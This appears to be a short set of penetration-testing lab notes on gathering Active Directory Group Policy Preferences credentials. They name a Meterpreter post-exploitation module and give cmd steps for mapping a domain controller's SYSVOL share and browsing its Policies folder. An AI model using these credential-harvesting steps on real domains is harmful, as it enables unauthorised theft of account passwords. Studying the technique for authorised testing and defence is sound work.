<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Gather-GPP-Creds</title>
</head><body>active directory credentials<br/>
<br/>
from meterpreter:<br/>
<br/>
run post/windows/gather/credentials/gpp<br/>
<br/>
<br/>
from windows shell<br/>
<br/>
Active Directory policies are stored in a special UNC path:<br/>
<br/>
from windows shell<br/>
<br/>
%USERDOMAIN%\Policies<br/>
<br/>
But you cannot access UNC paths via cmd, so you have to use the Sysvol share you can find<br/>
on a domain controller:<br/>
<br/>
%LOGONSERVER%\Sysvol<br/>
<br/>
To do that in the lab environment you can type:<br/>
&gt; net use X: \\DC01\SysVol<br/>
&gt; X:<br/>
&gt; cd examplead.lan\Policies<br/>
&gt; dir<br/>
</body></html>